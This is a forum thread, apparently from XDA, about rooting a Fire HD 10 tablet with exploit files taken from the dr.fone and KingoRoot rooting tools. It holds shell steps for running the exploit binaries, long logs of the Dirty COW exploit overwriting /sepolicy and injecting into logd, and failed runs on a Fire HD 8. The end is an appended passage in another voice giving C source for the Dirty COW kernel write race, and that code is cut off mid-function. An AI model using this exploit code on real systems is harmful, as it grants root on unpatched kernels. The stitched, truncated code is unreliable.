sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
check done
madviseThread() done
procselfmemThread() done
[*] exploited 0x7f83021000=f97cff8c
end!!!!!!!
<WSRoot><Exploit>0</Exploit></WSRoot>
<WSRoot><Done>0</Done></WSRoot>
9. Confirm by getting to a root shell:
Code:
su
10. Install SuperSU from /sdcard/c/ (you can just click on Docs on your home screen, go to local storage, then the c directory, and install the apk).
11. Open SuperSU and update binary as Normal (should be successful).
12. Click to reboot.
13. Set SuperSU to Grant as default access.
14. Delete the two wondershare directories in /data/data-lib/:
Code:
cd /data/data-lib
rm -r com.wondershare.DashRoot
rm -r wondershare
15. Not required: Perform other cleanup as needed (look for files in /system/xbin, /system/bin, /data, ... based on install date/time, etc.). Mount /system writable if you're going to be cleaning up items in /system:
Code:
su
mount -w -o remount /system
This is great. A nice framework to add new exploits and fuzz existing ones for previously non-rootable devices.
Now we just need Meltdown code...
@retyre - Great effort!
I am eagerly awaiting the report of your findings!
I am surprised that Amazon has not started pushing out a new OTA, it's been 4 weeks now since the first rooting report. Xmas must have gotten in the way, or the guy who knew how to patch holes quit.
Btw, there is the oldie but goodie - an effort to capture Kingoroot actions, you may try to follow it, if you have a bit of time:
https://forum.xda-developers.com/general/general/kingo-root-steals-imei-t3268525
bibikalka said:
... I am eagerly awaiting the report of your findings! ...
As I wrote in the OP, this is confirmed working. That's not what I am worried about here. It's this:
-- Given the widespread characterization of one-click rooting tools (like KingoRoot, dr.fone, etc.) as malware, I am worried it's "bad form" for me to be posting such binaries and scripts on this forum.
-- As shady as KingoRoot and dr.fone are, do they have IP rights (esp. the latter in this case) that I would be violating by posting these files here?
Check your PM.
retyre said:
As I wrote in the OP, this is confirmed working. That's not what I am worried about here. It's this:
-- Given the widespread characterization of one-click rooting tools (like KingoRoot, dr.fone, etc.) as malware, I am worried it's "bad form" for me to be posting such binaries and scripts on this forum.
-- As shady as KingoRoot and dr.fone are, do they have IP rights (esp. the latter in this case) that I would be violating by posting these files here?
Check your PM.
OK, thanks!
My bigger worry is that Amazon will grab these and plug the holes faster.
Btw, if the files have IP issues (or other ones ...), the most that'd happen is that the moderators here would just take it down.
The OP has been updated with all the steps and links to the required files. Please read the disclaimers before you begin.
retyre said:
The OP has been updated with all the steps and links to the required files. Please read the disclaimers before you begin.
Wow, you actually got direct links to dr.fone exploits, straight on their web site!!!
I am amazed that it's DirtyCow, it's been ages, I thought it got patched on Fires way back, in 2016.
Update:
Here is the most "official" link to SuperSu 2.82-SR5 :
https://download.chainfire.eu/1220/SuperSU/SR5-SuperSU-v2.82-SR5-20171001224502.zip
Any reason to use this SuperSu version vs the prior options?
bibikalka said:
Wow, you actually got direct links to dr.fone exploits, straight on their web site!!!
I am amazed that it's DirtyCow, it's been ages, I thought it got patched on Fires way back, in 2016.
Update:
Here is the most "official" link to SuperSu 2.82-SR5 :
https://download.chainfire.eu/1220/SuperSU/SR5-SuperSU-v2.82-SR5-20171001224502.zip
Any reason to use this SuperSu version vs the prior options?
Yes. URL snooping is part art, part science.
That's the flashable zip, not the apk. Do you have an official link to the apk? I searched, but couldn't locate one.
I thought we were using 2.79 because of the difficulty in replacing Kingo? That's not an issue here, and it updates successfully (does not report installation failed).
retyre said:
Yes. URL snooping is part art, part science.
That's the flashable zip, not the apk. Do you have an official link to the apk? I searched, but couldn't locate one.
I thought we were using 2.79 because of the difficulty in replacing Kingo? That's not an issue here, and it updates successfully (does not report installation failed).
Yes, correct, 2.79 did not complain about Kingo's su when replacing it. Btw, I was flashing 2.82 via FF, after patching it a bit. To get SuperSu.apk, you just need to unpack the zip, and it'll be sitting there, in E:\tmp\SR5-SuperSU-v2.82-SR5-20171001224502\common (or whatever).
Btw, I've edited build.prop a bit, first to remove arm64 in abilong (this would enable the stock SuperSu to work in FF, without patching), and then to disable OTAs via the version number:
http://www.aftvnews.com/how-to-bloc...k-by-setting-a-custom-fire-os-version-number/
Once I enabled OTA (renaming apk_ back to apk), it promptly downloaded 17 or 18 apks and updated the Amazon apps. Now I am on FireOS 5.5, and it did not download 5.6, meaning the version number trick works fine. So it'll freeze the ROM, but will continue updating apps.
"Offline" rooting with Kingo
This method is not as offline as the method in the OP, but here's how you can perform a variant of "offline" rooting with Kingo. I will begin by mentioning that Kingo's files are not easily accessible to the user, so you will have to have these files handy before you begin. Sadly, these files can only be obtained while Kingo is doing online rooting. Most (but not all, from what I have seen thus far) of these files are in your AppData\Local\Kingosoft\Kingo Root\files folder, but with different names.
I figured out the actual file names by matching the file sizes in the \files folder on my PC with the files created by Kingo in /data/local/tmp on the tablet while the online Kingo rooting process is _ongoing_ (ls -al). As I mentioned earlier, not every file in /data/local/tmp is in \files, though (could be in other folders on the PC; I haven't looked yet). Following this post, I also did a hex dump of the traffic over USB, but nearly all of it was Kingo transferring its files to /data/local/tmp..
Why does this have to be done while the rooting is in progress? Because Kingo cleans up the /data/local/tmp directory after the rooting is complete. In other words, you will have to copy the files from /data/local/tmp to /sdcard before the rooting completes. If you can do that, these are the files you will obtain: KingoUser.apk, busybox, ddexe, debuggerd, kingo, kingo_1b90d7d01 (likely a copy of KingoUser.apk), kingorootname, mkdevsh, su, suarm64, supolicy, suv7, install-recovery.sh, and libsupol.so (emphasis added to denote the required files). Some information is here as well.
So, what's the best way to obtain these files at this point? Sadly, by rooting (again) with Kingo. (Since these files are not publicly available, I do not think it's right for me to upload them somewhere.) If you can get a hold of these files and save them off the tablet, your future Kingo rooting can be completely offline ... and _mucho_ simpler than the procedure currently in the OP.
Here's what you would do with the aforementioned files:
-- Do steps 4 and 5 in the OP.
-- Download the SuperSU 2.79 apk from here and copy it to /sdcard.
-- Copy all the Kingo files to a folder on /sdcard (say, k).
-- Copy everything from /sdcard/k to /data/local/tmp:
Code:
cp /sdcard/k/* /data/local/tmp/
cd /data/local/tmp
ls -l
-- Change permissions to execute:
Code:
chmod 755 *
-- This is the actual rooting command:
Code:
./kingo
This should be done in less than a minute, after which you will be back at the shell prompt.
-- Test root:
Code:
su
-- Mount /system writable to check:
Code:
mount -w -o remount /system
-- Install SuperSU 2.79 to get around the "su binary occupied" issue with later SuperSU versions. You should see installation failed (as usual), but things should be fine after the reboot.
-- Set default access to Grant in SuperSU's settings.
I have tested this multiple times. Works every time. Like I said, much easier than the method currently in the OP, but with the added challenge of obtaining non-public rooting files.
How does Kingo root, you ask? The mkdevsh file in /data/local/tmp (it's not on the computer as far as I can tell) is the only script I could find. At this time, I do not know the exploit being used here; it appears to be significantly more efficient than the doctor's remedy, that's for sure. Anyone interested in reversing the "kingo" binary?
retyre said:
Why does this have to be done while the rooting is in progress? Because Kingo cleans up the /data/local/tmp directory after the rooting is complete. In other words, you will have to copy the files from /data/local/tmp to /sdcard before the rooting completes. If you can do that, these are the files you will obtain: KingoUser.apk, busybox, ddexe, debuggerd, kingo, kingo_1b90d7d01 (likely a copy of KingoUser.apk), kingorootname, mkdevsh, su, suarm64, supolicy, suv7, install-recovery.sh, libsupol.so. (The apk is not needed.) Some information is here as well.
...
-- This is the actual rooting command (I got this from here):
Code:
./kingo kingo
...
Do you think the 'su' above will end up in /system/xbin/su ? Or are those packed inside kingo executable?
Btw, I've studied dr.fone's exploit, and it's using 'su' by Chainfire, there is a text like this inside it.
I suspect these tools are recycling quite a bit of borrowed code, that's why they carefully clean up after they are done.
bibikalka said:
Do you think the 'su' above will end up in /system/xbin/su ? Or are those packed inside kingo executable?
IIRC, Kingo puts its su somewhere else (not in /system/xbin), hence the commands that follow. If I do this again (I guess I will; my test tablet doesn't know about Amendment VIII), I will look to see which su binary it's using.
retyre said:
IIRC, Kingo puts its su somewhere else (not in /system/xbin), hence the commands that follow. If I do this again (I guess I will; my test tablet doesn't know about Amendment VIII), I will look to see which su binary it's using.
OK, but would not SuperSu find whatever 'su' there is (left by Kingoroot), and update it? Why do you need to do it manually?
Code:
cp /data/local/tmp/su /system/xbin/
chmod 755 /system/xbin/su
I gotta say, it looks like Kingo is a much more professional malware outfit; dr.fone appears very amateurish in that regard. But regardless, given how well the other Fires held up post-DirtyCow, the good exploits are becoming quite scarce.
bibikalka said:
OK, but would not SuperSu find whatever 'su' there is (left by Kingoroot), and update it? Why do you need to do it manually?
Code:
cp /data/local/tmp/su /system/xbin/
chmod 755 /system/xbin/su
I gotta say, it looks like Kingo is a much more professional malware outfit; dr.fone appears very amateurish in that regard. But regardless, given how well the other Fires held up post-DirtyCow, the good exploits are becoming quite scarce.
Correct, SuperSU will find Kingo's su binary (in /sbin) and update it, so the manual copy is not needed. To answer your earlier question, Kingo uses the su binary from /data/local/tmp (but the "kingo" binary might well contain the same su). It looks like Kingo's su binary is the arm64 version, and the one from SuperSU is arm.
I am thinking the 2017 HD 10 may have multiple exploits. Clearly, dr.fone is using Dirty COW (and this memory exploit fails at times), but given the ease (and 100% success) with which Kingo is rooting, it may have found an easier exploit.
retyre said:
Correct, SuperSU will find Kingo's su binary (in /sbin) and update it, so the manual copy is not needed. To answer your earlier question, Kingo uses the su binary from /data/local/tmp (but the "kingo" binary might well contain the same su). It looks like Kingo's su binary is the arm64 version, and the one from SuperSU is arm.
I am thinking the 2017 HD 10 may have multiple exploits. Clearly, dr.fone is using Dirty COW (and this memory exploit fails at times), but given the ease (and 100% success) with which Kingo is rooting, it may have found an easier exploit.
For some reason, SuperSu could not correctly install the arm64 version of 'su'. What's in use after SuperSu is actually 'armv7'. I guess I did not try the SR5-2.82 zip yet; perhaps it'd work.
For the multiple exploits theory, it's interesting that Kingo also cannot root any other Fires right now, just this one (same as dr.fone). So either the Fire HD 10 2017 is chock-full of old holes, or Kingo just has a more efficient DirtyCow implementation and does its thing quicker.
I am sort of hoping that with the upcoming OTA, Amazon would make FireOS a bit more like a proper 64-bit Android thingy, without this hybrid stuff that seems to be throwing off a lot of misc apps (such as FlashFire and Xposed).
Has anyone tried the offline root on the 8? If not, I am going to soon, for sure.
Ae3NerdGod said:
Has anyone tried the offline root on the 8? If not, I am going to soon, for sure.
I just tried the OP's offline root instructions 3 times on my Fire HD 8 running 5.6.0.0 and it failed all 3 times. Here's the error code if you are curious:
Code:
---try 1---
C:\android\platform-tools>adb shell
[email protected]:/ $ ls -l /data/local/tmp
-rwxr-xr-x shell shell 1126000 2017-11-13 17:41 busybox
[email protected]:/ $ cp /sdcard/c/* /data/local/tmp
[email protected]:/ $ cd /data/local/tmp
[email protected]:/data/local/tmp $ ls -l
-rw-rw---- shell shell 109400 2018-01-19 21:15 Matrix
-rw-rw---- shell shell 6488979 2018-01-19 21:15 Superuser.apk
-rwxr-xr-x shell shell 1126000 2017-11-13 17:41 busybox
-rw-rw---- shell shell 67 2018-01-19 21:15 ddexe
-rw-rw---- shell shell 1756 2018-01-19 21:15 debuggerd
-rw-rw---- shell shell 202824 2018-01-19 21:15 fileWork
-rw-rw---- shell shell 629 2018-01-19 21:15 install-recovery.sh
-rw-rw---- shell shell 13592 2018-01-19 21:15 pidof
-rw-rw---- shell shell 1912 2018-01-19 21:15 start_wssud.sh
-rw-rw---- shell shell 75348 2018-01-19 21:15 su
-rw-rw---- shell shell 108480 2018-01-19 21:15 su_arm64
-rw-rw---- shell shell 101852 2018-01-19 21:15 supolicy
-rw-rw---- shell shell 177316 2018-01-19 21:15 toolbox
-rw-rw---- shell shell 38830 2018-01-19 21:15 wsroot.sh
[email protected]:/data/local/tmp $ chmod 755 *
[email protected]:/data/local/tmp $ ls -l
-rwxr-xr-x shell shell 109400 2018-01-19 21:15 Matrix
-rwxr-xr-x shell shell 6488979 2018-01-19 21:15 Superuser.apk
-rwxr-xr-x shell shell 1126000 2017-11-13 17:41 busybox
-rwxr-xr-x shell shell 67 2018-01-19 21:15 ddexe
-rwxr-xr-x shell shell 1756 2018-01-19 21:15 debuggerd
-rwxr-xr-x shell shell 202824 2018-01-19 21:15 fileWork
-rwxr-xr-x shell shell 629 2018-01-19 21:15 install-recovery.sh
-rwxr-xr-x shell shell 13592 2018-01-19 21:15 pidof
-rwxr-xr-x shell shell 1912 2018-01-19 21:15 start_wssud.sh
-rwxr-xr-x shell shell 75348 2018-01-19 21:15 su
-rwxr-xr-x shell shell 108480 2018-01-19 21:15 su_arm64
-rwxr-xr-x shell shell 101852 2018-01-19 21:15 supolicy
-rwxr-xr-x shell shell 177316 2018-01-19 21:15 toolbox
-rwxr-xr-x shell shell 38830 2018-01-19 21:15 wsroot.sh
[email protected]:/data/local/tmp $ ./Matrix /data/local/tmp 2
<WSRoot><Command>0</Command></WSRoot>
<WSRoot><InitResource>0</InitResource></WSRoot>
Decrypt Success: /data/local/tmp/fileWork
Output File Name: /data/local/tmp/fileWork.
<WSRoot><Decrypt>0</Decrypt></WSRoot>
extracting: /data/local/tmp/Bridge_wsroot.sh
extracting: /data/local/tmp/krdirtyCow32
extracting: /data/local/tmp/krdirtyCow64
extracting: /data/local/tmp/libsupol.so
extracting: /data/local/tmp/my.sh
extracting: /data/local/tmp/mysupolicy
extracting: /data/local/tmp/patch_script.sh
extracting: /data/local/tmp/root3
<WSRoot><Decompression>0</Decompression></WSRoot>
execute string: /data/local/tmp/root3 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6fffffff arg 0x1
ro.build.version.sdk :22
ro.product.cpu.abi :arm64-v8a
is x64
execute string: /data/local/tmp/krdirtyCow64 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6ffffffe arg 0xd30
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6fffffff arg 0x1
path : /data/local/tmp/
path : /data/local/tmp
[*] path_script:/data/local/tmp/patch_script.sh /data/local/tmp
rm: /data/local/tmp/sepolicy: No such file or directory
rm: /data/local/tmp/load: No such file or directory
supolicy v2.76 (ndk:armeabi) - Copyright (C) 2014-2016 - Chainfire
Patching policy [/data/local/tmp/sepolicy] --> [/data/local/tmp/load] ...
-permissive:zygote=ok
-permissive:kernel=ok
-permissive:init=ok
-permissive:su=ok
-permissive:init_shell=ok
-permissive:shell=ok
-permissive:servicemanager=ok
- Success
find_opcode offset:2d0 opcode:aaffbbee
find ok star:7f9a42c008 end:7f9a42c2d8 size:2d0
sh : /data/local/tmp/my.sh /data/local/tmp 2 fwrite is count 209221 /data/local/tmp/load1
fwrite is count 54048 /data/local/tmp/load2
find_opcode offset:2b4 opcode:eaeaeaea
find_opcode offset:2b8 opcode:ebebebeb
find_opcode offset:22d opcode:abababab
load = 40465 load1 = 33145 load2 = d320
find_opcode offset:2b0 opcode:efefefef
find_opcode offset:24d opcode:cdcdcdcd
find_opcode offset:2bc opcode:acacacac
init_shellcode
loadsize:263269
loadpath:/data/local/tmp/load
shpath:/data/local/tmp/my.sh /data/local/tmp 2
shpath:2bc
open /proc
PID:188
find logd pid : bc
_inject_start_s:0x7f9a42c008
Copying /sepolicy to /data/local/tmp/cp_sepolicy
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load1
size: 209221
[*] mmap 0x7f9a225000;
[*] exploit (patch)
[*] currently 0x7f9a225000=8f97cff8c
sched_setaffinity: Invalid argument[*] madvise = 0x7f9a225000 209221
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
exit fork(), loop time more then 30s
<WSRoot><Exploit>0x00000332</Exploit></WSRoot>
check done
sched_setaffinity: Invalid argument<WSRoot><Exploit>0x00000382</Exploit></WSRoot>
FAIL : load1 --> /sepolicy
<WSRoot><Exploit>0x00000341</Exploit></WSRoot>
<WSRoot><Exploit>0x00000881</Exploit></WSRoot>
<WSRoot><Done>0x00000172</Done></WSRoot>
1|[email protected]:/data/local/tmp $ ls
Bridge_wsroot.sh
Matrix
Superuser.apk
busybox
cp_sepolicy
ddexe
debuggerd
fileWork
fileWork.
install-recovery.sh
krdirtyCow32
krdirtyCow64
libsupol.so
load
load1
load2
my.sh
mysupolicy
patch_script.sh
pidof
root3
sepolicy
start_wssud.sh
su
su_arm64
supolicy
toolbox
wsroot.sh
[email protected]:/data/local/tmp $ rm *
[email protected]:/data/local/tmp $ ls
[email protected]:/data/local/tmp $ exit
C:\android\platform-tools>adb reboot
---try 2---
C:\android\platform-tools>adb shell
[email protected]:/ $ cp /sdcard/c/* /data/local/tmp
[email protected]:/ $ cd /data/local/tmp
[email protected]:/data/local/tmp $ ls -l
-rw-rw---- shell shell 109400 2018-01-19 21:37 Matrix
-rw-rw---- shell shell 6488979 2018-01-19 21:37 Superuser.apk
-rw-rw---- shell shell 67 2018-01-19 21:37 ddexe
-rw-rw---- shell shell 1756 2018-01-19 21:37 debuggerd
-rw-rw---- shell shell 202824 2018-01-19 21:37 fileWork
-rw-rw---- shell shell 629 2018-01-19 21:37 install-recovery.sh
-rw-rw---- shell shell 13592 2018-01-19 21:37 pidof
-rw-rw---- shell shell 1912 2018-01-19 21:37 start_wssud.sh
-rw-rw---- shell shell 75348 2018-01-19 21:37 su
-rw-rw---- shell shell 108480 2018-01-19 21:37 su_arm64
-rw-rw---- shell shell 101852 2018-01-19 21:37 supolicy
-rw-rw---- shell shell 177316 2018-01-19 21:37 toolbox
-rw-rw---- shell shell 38830 2018-01-19 21:37 wsroot.sh
[email protected]:/data/local/tmp $ chmod 755 *
[email protected]:/data/local/tmp $ ./Matrix /data/local/tmp 2
<WSRoot><Command>0</Command></WSRoot>
<WSRoot><InitResource>0</InitResource></WSRoot>
Decrypt Success: /data/local/tmp/fileWork
Output File Name: /data/local/tmp/fileWork.
<WSRoot><Decrypt>0</Decrypt></WSRoot>
extracting: /data/local/tmp/Bridge_wsroot.sh
extracting: /data/local/tmp/krdirtyCow32
extracting: /data/local/tmp/krdirtyCow64
extracting: /data/local/tmp/libsupol.so
extracting: /data/local/tmp/my.sh
extracting: /data/local/tmp/mysupolicy
extracting: /data/local/tmp/patch_script.sh
extracting: /data/local/tmp/root3
<WSRoot><Decompression>0</Decompression></WSRoot>
execute string: /data/local/tmp/root3 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6fffffff arg 0x1
ro.build.version.sdk :22
ro.product.cpu.abi :arm64-v8a
is x64
execute string: /data/local/tmp/krdirtyCow64 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6ffffffe arg 0xd30
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6fffffff arg 0x1
path : /data/local/tmp/
path : /data/local/tmp
[*] path_script:/data/local/tmp/patch_script.sh /data/local/tmp
rm: /data/local/tmp/sepolicy: No such file or directory
rm: /data/local/tmp/load: No such file or directory
supolicy v2.76 (ndk:armeabi) - Copyright (C) 2014-2016 - Chainfire
Patching policy [/data/local/tmp/sepolicy] --> [/data/local/tmp/load] ...
-permissive:zygote=ok
-permissive:kernel=ok
-permissive:init=ok
-permissive:su=ok
-permissive:init_shell=ok
-permissive:shell=ok
-permissive:servicemanager=ok
- Success
find_opcode offset:2d0 opcode:aaffbbee
find ok star:7f7acc6008 end:7f7acc62d8 size:2d0
sh : /data/local/tmp/my.sh /data/local/tmp 2 fwrite is count 209221 /data/local/tmp/load1
fwrite is count 54048 /data/local/tmp/load2
find_opcode offset:2b4 opcode:eaeaeaea
find_opcode offset:2b8 opcode:ebebebeb
find_opcode offset:22d opcode:abababab
load = 40465 load1 = 33145 load2 = d320
find_opcode offset:2b0 opcode:efefefef
find_opcode offset:24d opcode:cdcdcdcd
find_opcode offset:2bc opcode:acacacac
init_shellcode
loadsize:263269
loadpath:/data/local/tmp/load
shpath:/data/local/tmp/my.sh /data/local/tmp 2
shpath:2bc
open /proc
PID:188
find logd pid : bc
_inject_start_s:0x7f7acc6008
Copying /sepolicy to /data/local/tmp/cp_sepolicy
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load1
size: 209221
[*] mmap 0x7f7aabf000;
[*] exploit (patch)
[*] currently 0x7f7aabf000=8f97cff8c
sched_setaffinity: Invalid argument[*] madvise = 0x7f7aabf000 209221
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
exit fork(), loop time more then 30s
<WSRoot><Exploit>0x00000332</Exploit></WSRoot>
check done
sched_setaffinity: Invalid argument<WSRoot><Exploit>0x00000382</Exploit></WSRoot>
FAIL : load1 --> /sepolicy
<WSRoot><Exploit>0x00000341</Exploit></WSRoot>
--- try 3 ---
C:\android\platform-tools>adb shell
[email protected]:/ $ cp /sdcard/c/* /data/local/tmp
[email protected]:/ $ cd /data/local/tmp
[email protected]:/data/local/tmp $ chmod 755 *
[email protected]:/data/local/tmp $ ./Matrix /data/local/tmp 2
<WSRoot><Command>0</Command></WSRoot>
<WSRoot><InitResource>0</InitResource></WSRoot>
Decrypt Success: /data/local/tmp/fileWork
Output File Name: /data/local/tmp/fileWork.
<WSRoot><Decrypt>0</Decrypt></WSRoot>
extracting: /data/local/tmp/Bridge_wsroot.sh
extracting: /data/local/tmp/krdirtyCow32
extracting: /data/local/tmp/krdirtyCow64
extracting: /data/local/tmp/libsupol.so
extracting: /data/local/tmp/my.sh
extracting: /data/local/tmp/mysupolicy
extracting: /data/local/tmp/patch_script.sh
extracting: /data/local/tmp/root3
<WSRoot><Decompression>0</Decompression></WSRoot>
execute string: /data/local/tmp/root3 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6ffffffe arg 0x600
WARNING: linker: /data/local/tmp/root3: unused DT entry: type 0x6fffffff arg 0x1
ro.build.version.sdk :22
ro.product.cpu.abi :arm64-v8a
is x64
execute string: /data/local/tmp/krdirtyCow64 /data/local/tmp/ 2
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6ffffffe arg 0xd30
WARNING: linker: /data/local/tmp/krdirtyCow64: unused DT entry: type 0x6fffffff arg 0x1
path : /data/local/tmp/
path : /data/local/tmp
[*] path_script:/data/local/tmp/patch_script.sh /data/local/tmp
rm: /data/local/tmp/sepolicy: No such file or directory
rm: /data/local/tmp/load: No such file or directory
supolicy v2.76 (ndk:armeabi) - Copyright (C) 2014-2016 - Chainfire
Patching policy [/data/local/tmp/sepolicy] --> [/data/local/tmp/load] ...
-permissive:zygote=ok
-permissive:kernel=ok
-permissive:init=ok
-permissive:su=ok
-permissive:init_shell=ok
-permissive:shell=ok
-permissive:servicemanager=ok
- Success
find_opcode offset:2d0 opcode:aaffbbee
find ok star:7fa3584008 end:7fa35842d8 size:2d0
sh : /data/local/tmp/my.sh /data/local/tmp 2 fwrite is count 209221 /data/local/tmp/load1
fwrite is count 54048 /data/local/tmp/load2
find_opcode offset:2b4 opcode:eaeaeaea
find_opcode offset:2b8 opcode:ebebebeb
find_opcode offset:22d opcode:abababab
load = 40465 load1 = 33145 load2 = d320
find_opcode offset:2b0 opcode:efefefef
find_opcode offset:24d opcode:cdcdcdcd
find_opcode offset:2bc opcode:acacacac
init_shellcode
loadsize:263269
loadpath:/data/local/tmp/load
shpath:/data/local/tmp/my.sh /data/local/tmp 2
shpath:2bc
open /proc
PID:188
find logd pid : bc
_inject_start_s:0x7fa3584008
Copying /sepolicy to /data/local/tmp/cp_sepolicy
cow_exploit_mv_file_init: Overriding /sepolicy from /data/local/tmp/load1
size: 209221
[*] mmap 0x7fa337d000;
[*] exploit (patch)
[*] currently 0x7fa337d000=8f97cff8c
sched_setaffinity: Invalid argument[*] madvise = 0x7fa337d000 209221
checking the patch ... exploit
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
sleep 1s
exit fork(), loop time more then 30s
<WSRoot><Exploit>0x00000332</Exploit></WSRoot>
check done
sched_setaffinity: Invalid argument<WSRoot><Exploit>0x00000382</Exploit></WSRoot>
FAIL : load1 --> /sepolicy
<WSRoot><Exploit>0x00000341</Exploit></WSRoot>
Got the same thing.
I even tried other dirtyc0w versions and compiling my own. Do I need to use different files to overwrite on the HD 8?
And btw, I'm running 5.3.3.0 FireOS, kernel 3.18; it should totally be vulnerable, right, OP?
Any chance of helping us sort this out on the 8?
Ae3NerdGod said:
Got the same thing.
I even tried other dirtyc0w versions and compiling my own. Do I need to use different files to overwrite on the HD 8?
And btw, I'm running 5.3.3.0 FireOS, kernel 3.18; it should totally be vulnerable, right, OP?
Any chance of helping us sort this out on the 8?
The 2017 HD 10 is the only Fire tablet I have access to. These are the other exploits the doctor downloads (if the one in the OP fails; it usually doesn't fail on the 2017 HD 10, but one can manually delete files in /system to force it to fail): 6301805.zip, 21486085.zip, 1805PXN.zip, 7083636.zip.
Try each .zip, repeating the steps in the OP. See the OP for the output that should be generated when you execute the files in 20165195.zip.
Keep in mind that many of these CVEs are years old and have been patched (or so they claim). For some reason, the 2017 HD 10 is still vulnerable.
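The exploit the doctor's krdirtyCow64 binary is driving in the logs above (the "madviseThread() done" / "procselfmemThread() done" lines) is Dirty COW, CVE-2016-5195. What follows is an added illustration of the bare write primitive, written for this page; it is not dr.fone's, Kingo's or any poster's code. It takes a private, read-only mapping of a file, has one thread discard the private copy with madvise(MADV_DONTNEED) while another writes through /proc/self/mem, and checks whether the file changed. On an unpatched kernel the write lands in the shared page-cache page, which is how the tool replaces /sepolicy with its permissive load1 and later puts cp_sepolicy back. On a patched kernel (or when the race is simply not won) nothing changes and the tool sleeps until its loop gives up, which is what the "exit fork(), loop time more then 30s" line in the HD 8 runs looks like. The real tool goes further than this (the "find logd pid" and "_inject_start_s" lines show it injecting into logd with the same primitive); this example stops at the write. The sched_setaffinity errors in the logs are the tool failing to pin its threads; the successful HD 10 run shows that is non-fatal, and this example does not pin at all. The scratch file name, its content, the "PWNED" payload and the attempt bound are demo choices only; the program targets nothing but a file it creates itself.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <unistd.h>

/* State shared by the two racing threads. */
struct race {
    void *map;             /* private, read-only mapping of the target file  */
    size_t len;            /* length of that mapping                         */
    const char *payload;   /* bytes we want to land at offset 0 of the file  */
    size_t payload_len;
    unsigned iterations;   /* upper bound on attempts so it cannot spin forever */
    volatile int stop;     /* set by whichever thread finishes first         */
};

/* Thread 1 ("madviseThread" in the dr.fone log): keep throwing away the
 * process's private COW copy of the page, so the kernel must fault it in
 * again from the file's page cache. */
static void *madvise_thread(void *arg)
{
    struct race *r = arg;
    for (unsigned i = 0; i < r->iterations && !r->stop; i++)
        madvise(r->map, r->len, MADV_DONTNEED);
    r->stop = 1;
    return NULL;
}

/* Thread 2 ("procselfmemThread"): write the payload at the mapping's address
 * through /proc/self/mem, which uses get_user_pages() with FOLL_FORCE.
 * CVE-2016-5195 is the window in which that write is applied to the shared
 * page-cache page instead of to our private copy. */
static void *procselfmem_thread(void *arg)
{
    struct race *r = arg;
    int fd = open("/proc/self/mem", O_RDWR);
    if (fd < 0) { r->stop = 1; return NULL; }
    for (unsigned i = 0; i < r->iterations && !r->stop; i++) {
        lseek(fd, (off_t)(uintptr_t)r->map, SEEK_SET);
        ssize_t w = write(fd, r->payload, r->payload_len);
        (void)w;   /* on a patched kernel this only changes our private copy */
    }
    close(fd);
    r->stop = 1;
    return NULL;
}

/* Try to overwrite the first bytes of a file we may only read.
 * Returns 1 if the file's content changed (kernel vulnerable), 0 if the kernel
 * held (patched, or race not won within the bound), -1 on a setup error.
 * payload must be 1..63 bytes and no longer than the file. */
int dirtycow_write(const char *path, const char *payload, unsigned iterations)
{
    size_t plen = strlen(payload);
    struct stat st;
    int fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
    if (fstat(fd, &st) < 0 || plen == 0 || plen >= 64 || st.st_size < (off_t)plen) {
        close(fd);
        return -1;
    }
    struct race r = { .len = (size_t)st.st_size, .payload = payload,
                      .payload_len = plen, .iterations = iterations, .stop = 0 };
    r.map = mmap(NULL, r.len, PROT_READ, MAP_PRIVATE, fd, 0);
    if (r.map == MAP_FAILED) { close(fd); return -1; }

    pthread_t t1, t2;
    if (pthread_create(&t1, NULL, madvise_thread, &r) != 0) {
        munmap(r.map, r.len); close(fd); return -1;
    }
    if (pthread_create(&t2, NULL, procselfmem_thread, &r) != 0) {
        r.stop = 1; pthread_join(t1, NULL); munmap(r.map, r.len); close(fd); return -1;
    }
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    munmap(r.map, r.len);
    close(fd);

    /* Re-read through the page cache: if the race won, every reader of the
     * file now sees the payload at offset 0. */
    char buf[64] = {0};
    fd = open(path, O_RDONLY);
    if (fd < 0) return -1;
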